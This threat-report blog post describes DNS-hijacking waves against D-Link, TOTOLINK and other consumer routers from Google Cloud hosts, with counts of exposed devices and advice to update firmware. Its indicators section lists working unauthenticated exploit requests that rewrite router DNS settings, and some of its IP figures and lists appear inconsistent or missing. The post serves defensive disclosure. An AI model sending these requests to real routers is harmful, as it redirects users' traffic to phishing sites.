Over the last three months, our honeypots have detected DNS hijacking attacks targeting various types of consumer routers. All exploit attempts have originated from hosts on the network of Google Cloud Platform (AS15169). In this campaign, we’ve identified four distinct rogue DNS servers being used to redirect web traffic for malicious purposes.
First wave – December 29, 2018
⚠️ WARNING ⚠️
Unauthenticated Remote DNS Change Exploit Detected
— Bad Packets Report (@bad_packets) December 30, 2018
The first DNS hijacking exploit attempts targeted multiple models of D-Link DSL modems, including:
The IP address of rogue DNS server used in this attack was 188.8.131.52 and hosted by OVH Canada.
Second wave – February 6, 2019
⚠️ WARNING ⚠️
Additional exploit attempts detected from new unique hosts. All source IPs originate from AS15169 (Google LLC) and are assigned to @googlecloud customers.
— Bad Packets Report (@bad_packets) February 7, 2019
This wave targeted the same types of D-Link modems listed above. The rogue DNS server, 184.108.40.206, was again hosted by OVH Canada.
As Twitter user “parseword” noted, the majority of the DNS requests were being redirected to two IPs allocated to a crime-friendly hosting provider (AS206349) and another pointing to a service that monetizes parked domain names (AS395082).
Third wave – March 26, 2019
⚠️ WARNING ⚠️
Multiple Remote DNS Change Exploits Detectedhttps://t.co/Ku6Wv997Yc
Target: Multiple (see attached list of routers)
Source IP: Multiple @googlecloud hosts (AS15169) 🇺🇸
Recon Scan Type: Masscan
Rogue DNS servers: 220.127.116.11 & 18.104.22.168 (AS47196) 🇷🇺 pic.twitter.com/IKXQDZBjv1
— Bad Packets Report (@bad_packets) March 30, 2019
The latest wave of attacks came from three distinct Google Cloud Platform hosts and targeted additional types of consumer routers not previously seen before including: ARG-W4 ADSL routers, DSLink 260E routers, Secutech routers, and TOTOLINK routers.
The rogue DNS servers used in this round, 22.214.171.124 and 126.96.36.199, are both hosted in Russia by Inoventica Services. Internet access is provided by their subsidiary Garant-Park-Internet Ltd (AS47196).
In all three waves, a recon scan was done using Masscan to check for active hosts on port 81/tcp prior to attempting the DNS hijacking exploits.
How many targeted devices are vulnerable?
Establishing a definitive total of vulnerable devices would require us to employ the same tactics used by the threat actors in this campaign. Obviously this won’t be done, however we can catalog how many are exposing at least one service to the public internet via data provided by BinaryEdge:
D-Link DSL-2640B – 14,327
D-Link DSL-2740R – 379
D-Link DSL-2780B – 0
D-Link DSL-526B – 7
ARG-W4 ADSL routers – 0
DSLink 260E routers – 7
Secutech routers – 17
TOTOLINK routers – 2,265
Why are DNS hijacking attacks conducted?
As we saw in years past with DNSChanger malware raking in $14 million, advertising-related fraud is still very lucrative for cybercriminals. Other researchers have noted domain parking remains a booming business often tied to illicit activities.
DNS hijacking is also used for phishing attacks which are largely transparent to users. In this case, the domain name of the targeted site is redirected by the rogue DNS server to a web server controlled by the threat actor. A recent DNS hijacking campaign targeting Brazilian banks was documented by Radware researchers.
Why was Google Cloud Platform used?
Being a large cloud service provider, dealing with abuse is an ongoing process for Google. However unlike their competitors, Google makes it very easy for a miscreants to abuse their platform.
Anyone with a Google account can access a “Google Cloud Shell” machine by simply visiting this URL. This service provides users with the equivalent of a Linux VPS with root privileges directly in a web browser. Due to the ephemeral nature of these virtual machines coupled with Google’s slow response time to abuse reports, it’s difficult to prevent this kind of malicious behavior.
Exploit Attempt Source IPs 188.8.131.52 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 126.96.36.199 188.8.131.52 Rogue DNS Servers 184.108.40.206 220.127.116.11 18.104.22.168 22.214.171.124 Exploit Attempts /action?dns_status=1&dns_poll_timeout=2&id=57&dns_server_ip_1=195&dns_server_ip_2=128&dns_server_ip_3=126&dns_server_ip_4=165&priority=1&cmdadd=add /boafrm/formbasetcpipsetup?dnsmode=dnsmanual&dns1=126.96.36.199&dns2=188.8.131.52&dns3=184.108.40.206&dnsrefresh=1 /dnscfg.cgi?dnsPrimary=220.127.116.11&dnsSecondary=18.104.22.168&dnsDynamic=0&dnsRefresh=1 /form2dns.cgi?dnsmode=1&dns1=22.214.171.124&dns2=126.96.36.199&dns3=&submit.htm?dns.htm=send&save=apply /wan_dns.asp?go=wan_dns.asp&reboottag=&dsen=1&dnsen=on&ds1=188.8.131.52&ds2=184.108.40.206 /dnscfg.cgi?dnsPrimary=220.127.116.11&dnsSecondary=18.104.22.168&dnsDynamic=0&dnsRefresh=1 /dnscfg.cgi?dnsPrimary=22.214.171.124&dnsSecondary=126.96.36.199&dnsDynamic=0&dnsRefresh=1
In general, we recommend users to keep their home router firmware up-to-date. When security vulnerabilities are discovered, they are usually patched by the manufacturer to mitigate further attacks. It’s also advisable to review your router’s DNS settings to ensure they haven’t been tampered with. Typically your DNS servers should be set to the ones provided by your ISP or well-known public DNS resolvers.
Ixia researchers posted their findings on the DNS hijacking attacks originating from Google Cloud Platform. They found sites targeted for phishing included Netflix, PayPal, Uber, Gmail, and more.
We’ve been tracking the DNS hijacking attacks reported by @bad_packets yesterday. Here’s an updated list of targeted domains, along with the new IP hosting the phishing sites. Paypal, Google, Netflix are targeted, along with Brazilian banks and hosting services. HT @_mihaiv_ pic.twitter.com/C4tym5dN3H
— Stefan Tanase @ #TheSAS2019 (@stefant) April 5, 2019
They’ve also identified additional rogue DNS servers, again hosted by Inoventica Services in Russia:
A Google spokesperson provided the following statement to Ars Technica in regards to the abuse of Google Cloud Platform to conduct the DNS hijacking attacks: